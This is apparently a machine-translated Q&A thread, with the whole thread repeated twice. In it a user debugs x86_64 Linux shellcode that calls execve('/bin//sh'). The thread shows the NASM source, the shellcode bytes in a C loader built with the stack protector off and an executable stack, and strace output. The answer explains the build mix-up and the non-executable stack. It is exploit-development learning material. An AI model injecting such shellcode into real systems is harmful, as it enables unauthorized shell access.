在 linux x86_64 程序集中生成 shell
spawning a shell in linux x86_64 assembly
我正在尝试制作一个 shell 代码,该代码在 Linux x86_64 程序集中生成“/bin/sh” shell,当我执行它时作为可执行文件,它工作得很好。问题是当我转储代码的二进制文件并将其作为字符串放置时出现错误:
'segmentation fault: core dumped '
global _start
section .text
_start:
push 59 ;sys_execve
pop rax
xor rdi, rdi
push rdi
mov rdi, 0x68732F2f6e69622F ;/bin//sh in reverse
push rdi
mov rdi, rsp ;pointer to the /bin//sh
xor rsi, rsi ;NULL
xor rdx, rdx ;NULL
syscall
shell没有二进制的 C 代码:
#include <stdio.h>
char sh[]="\x6a\x3b\x58\x48\x31\xff\x57\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x0f\x05 ";
void main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) sh;
(int)(*func)();
}
我用来生成 shell代码的命令:
nasm -felf64 shellcode.nasm -o shellcode.o
ld shellcode.o -o shellcode
我用来生成我正在利用的程序的命令:
gcc -fno-stack-protector -z execstack shellcode.c
strace ./shell代码输出:
execve("./shellcode", ["./shellcode"], 0x7ffe19f431f0 /* 59 vars */) = 0
brk(NULL) = 0x5651f32c3000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=96319, ...}) = 0
mmap(NULL, 96319, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7ff0d7a8d000
close(3) = 0
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "7ELF[=17=][=17=][=17=][=17=][=17=][=17=][=17=][=17=][=17=]>[=17=][=17=][=17=][=17=]0[=17=][=17=][=17=][=17=][=17=]"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=2030544, ...}) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ff0d7a8b000
mmap(NULL, 4131552, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7ff0d748d000
mprotect(0x7ff0d7674000, 2097152, PROT_NONE) = 0
mmap(0x7ff0d7874000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1e7000) = 0x7ff0d7874000
mmap(0x7ff0d787a000, 15072, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7ff0d787a000
close(3) = 0
arch_prctl(ARCH_SET_FS, 0x7ff0d7a8c4c0) = 0
mprotect(0x7ff0d7874000, 16384, PROT_READ) = 0
mprotect(0x5651f168d000, 4096, PROT_READ) = 0
mprotect(0x7ff0d7aa5000, 4096, PROT_READ) = 0
munmap(0x7ff0d7a8d000, 96319) = 0
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_ACCERR, si_addr=0x5651f168e020} ---
+++ killed by SIGSEGV (core dumped) +++
Segmentation fault (core dumped)
gcc -fno-stack-protector -z execstack shellcode.c 不会创建名为 shellcode 的文件。 它创建 a.out 因为你没有使用 -o.
因此 运行ning strace ./shellcode 将 运行 您使用 NASM + ld 生成的二进制文件。但是您显示的 strace 输出与静态可执行文件不匹配。可能是您忘记了 -z execstack
的早期 gcc 调用
运行 strace ./a.out 到 运行 您使用 gcc 从您当前版本的源构建的文件。
如果您将错误的参数传递给 execve,strace 会显示它返回 -EFAULT。但是如果没有那个可能意味着您 运行 的可执行文件试图跳转到 non-executable 页面。这将完美匹配没有 -zexecstack.
的二进制构建
我正在尝试制作一个 shell 代码,该代码在 Linux x86_64 程序集中生成“/bin/sh” shell,当我执行它时作为可执行文件,它工作得很好。问题是当我转储代码的二进制文件并将其作为字符串放置时出现错误:
'segmentation fault: core dumped '
global _start
section .text
_start:
push 59 ;sys_execve
pop rax
xor rdi, rdi
push rdi
mov rdi, 0x68732F2f6e69622F ;/bin//sh in reverse
push rdi
mov rdi, rsp ;pointer to the /bin//sh
xor rsi, rsi ;NULL
xor rdx, rdx ;NULL
syscall
shell没有二进制的 C 代码:
#include <stdio.h>
char sh[]="\x6a\x3b\x58\x48\x31\xff\x57\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x0f\x05 ";
void main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) sh;
(int)(*func)();
}
我用来生成 shell代码的命令:
nasm -felf64 shellcode.nasm -o shellcode.o
ld shellcode.o -o shellcode
我用来生成我正在利用的程序的命令:
gcc -fno-stack-protector -z execstack shellcode.c
strace ./shell代码输出:
execve("./shellcode", ["./shellcode"], 0x7ffe19f431f0 /* 59 vars */) = 0
brk(NULL) = 0x5651f32c3000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=96319, ...}) = 0
mmap(NULL, 96319, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7ff0d7a8d000
close(3) = 0
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "7ELF[=17=][=17=][=17=][=17=][=17=][=17=][=17=][=17=][=17=]>[=17=][=17=][=17=][=17=]0[=17=][=17=][=17=][=17=][=17=]"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=2030544, ...}) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ff0d7a8b000
mmap(NULL, 4131552, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7ff0d748d000
mprotect(0x7ff0d7674000, 2097152, PROT_NONE) = 0
mmap(0x7ff0d7874000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1e7000) = 0x7ff0d7874000
mmap(0x7ff0d787a000, 15072, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7ff0d787a000
close(3) = 0
arch_prctl(ARCH_SET_FS, 0x7ff0d7a8c4c0) = 0
mprotect(0x7ff0d7874000, 16384, PROT_READ) = 0
mprotect(0x5651f168d000, 4096, PROT_READ) = 0
mprotect(0x7ff0d7aa5000, 4096, PROT_READ) = 0
munmap(0x7ff0d7a8d000, 96319) = 0
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_ACCERR, si_addr=0x5651f168e020} ---
+++ killed by SIGSEGV (core dumped) +++
Segmentation fault (core dumped)
gcc -fno-stack-protector -z execstack shellcode.c 不会创建名为 shellcode 的文件。 它创建 a.out 因为你没有使用 -o.
因此 运行ning strace ./shellcode 将 运行 您使用 NASM + ld 生成的二进制文件。但是您显示的 strace 输出与静态可执行文件不匹配。可能是您忘记了 -z execstack
gcc 调用
运行 strace ./a.out 到 运行 您使用 gcc 从您当前版本的源构建的文件。
如果您将错误的参数传递给 execve,strace 会显示它返回 -EFAULT。但是如果没有那个可能意味着您 运行 的可执行文件试图跳转到 non-executable 页面。这将完美匹配没有 -zexecstack.